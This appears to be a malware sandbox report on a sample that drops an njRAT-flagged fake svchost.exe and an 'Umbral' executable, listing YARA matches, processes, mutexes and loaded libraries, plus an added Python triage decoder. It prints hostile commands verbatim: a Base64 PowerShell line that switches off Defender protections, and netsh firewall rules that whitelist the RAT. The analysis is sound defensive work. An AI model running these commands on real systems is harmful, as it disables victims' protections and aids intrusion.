Source: KvS2rT08PQ.exe | Binary or memory string: OriginalFilenameNAM HERE.exe4 vs KvS2rT08PQ.exe
Source: KvS2rT08PQ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.svchost.exe.e00000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 1.0.Umbral.exe.253f8f30000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: ANDYzz-protected.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ANDYzz-protected.exe.0.dr | Static PE information: Section: fgen ZLIB complexity 1.000328828011611
Source: Umbral.exe.0.dr, --.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
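The Base64 string recovered from the Umbral.exe source decodes to a Set-MpPreference command line. The following Python is added here as an example and is not code from Joe Sandbox or from Umbral: it decodes the string strictly (a blob that is not valid Base64 raises instead of yielding garbage), splits the two commands joined by `&&`, parses each Set-MpPreference call into its parameters, and lists every parameter whose value weakens Defender. REPORT_B64 is the string quoted in the line above; the table of weakening parameter values is this example's own reading of the Set-MpPreference cmdlet, not something the report states.

```python
"""Decode the Base64 string the report recovered from Umbral.exe and list the
Microsoft Defender protections the decoded command switches off.

Added example for this page, not code from Joe Sandbox or from the sample.
REPORT_B64 is the string quoted in the report.  WEAKENING is this example's
own table of Set-MpPreference parameters and the values that weaken Defender
(numeric values are the cmdlet's enum equivalents)."""
import base64
import binascii
from typing import Dict, List, Set, Union

REPORT_B64 = (
    "U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURp"
    "c2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAt"
    "RGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERp"
    "c2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0"
    "aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBT"
    "ZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy"
)

# Parameter names lower-cased because PowerShell matches them case-insensitively.
WEAKENING: Dict[str, Set[str]] = {
    "disableintrusionpreventionsystem": {"$true", "1"},
    "disableioavprotection": {"$true", "1"},
    "disablerealtimemonitoring": {"$true", "1"},
    "disablescriptscanning": {"$true", "1"},
    "disablebehaviormonitoring": {"$true", "1"},
    "enablecontrolledfolderaccess": {"disabled", "0"},
    "enablenetworkprotection": {"disabled", "auditmode", "0", "2"},
    "mapsreporting": {"disabled", "0"},
    "submitsamplesconsent": {"neversend", "2"},
}


def decode_command(b64: str) -> str:
    """Strict Base64 decode; invalid input raises ValueError."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid Base64: {exc}") from exc
    return raw.decode("utf-8", errors="replace")


def parse_mppreference(command: str) -> List[Dict[str, Union[str, bool]]]:
    """Return the parameters of every Set-MpPreference call in a '&&'-joined
    command string.  Parameter names keep their original case; a switch with
    no value (-Force) is stored as True."""
    calls: List[Dict[str, Union[str, bool]]] = []
    for part in command.split("&&"):
        tokens = part.split()
        lowered = [t.lower() for t in tokens]
        if "set-mppreference" not in lowered:
            continue
        params: Dict[str, Union[str, bool]] = {}
        i = lowered.index("set-mppreference") + 1
        while i < len(tokens):
            tok = tokens[i]
            if tok.startswith("-"):
                has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
                params[tok[1:]] = tokens[i + 1] if has_value else True
                i += 2 if has_value else 1
            else:
                i += 1
        calls.append(params)
    return calls


def defender_tampering(command: str) -> List[str]:
    """List 'Name=value' for every parameter set to a weakening value."""
    findings: List[str] = []
    for params in parse_mppreference(command):
        for name, value in params.items():
            bad = WEAKENING.get(name.lower())
            if bad and str(value).lower() in bad:
                findings.append(f"{name}={value}")
    return findings


if __name__ == "__main__":
    decoded = decode_command(REPORT_B64)
    print(decoded)
    for finding in defender_tampering(decoded):
        print("weakens Defender:", finding)
```

Decoded, the string turns off real-time monitoring, IOAV, script scanning and the intrusion prevention system, disables controlled folder access and cloud (MAPS) reporting, drops network protection to audit mode and sets sample submission to never send, then repeats the last setting with its numeric form in a second PowerShell call. The same parser applies to any Set-MpPreference line pulled from PowerShell script-block logs (Event ID 4104) during triage.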
Source: classification engine | Classification label: mal100.spre.phis.troj.spyw.evad.winEXE@19/9@6/6
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_065324CE AdjustTokenPrivileges
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 2_2_06532497 AdjustTokenPrivileges
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KvS2rT08PQ.exe.log
Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\6uXEbtir2ybaHnvlC
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\62b7d4736043995d94b02f8790cef504
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Mutant created: \Sessions\1\BaseNamedObjects\heh5456GeEquhSfLaVSv
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File created: C:\Users\user\AppData\Local\Temp\Umbral.exe
Source: KvS2rT08PQ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KvS2rT08PQ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: KvS2rT08PQ.exe | ReversingLabs: Detection: 68%
Source: KvS2rT08PQ.exe | Virustotal: Detection: 71%
Source: unknown | Process created: C:\Users\user\Desktop\KvS2rT08PQ.exe "C:\Users\user\Desktop\KvS2rT08PQ.exe"
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\Desktop\KvS2rT08PQ.exe | Process created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe"
Source: C:\Users\user\AppData\Local\Temp\Umbral.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLEJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLEJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
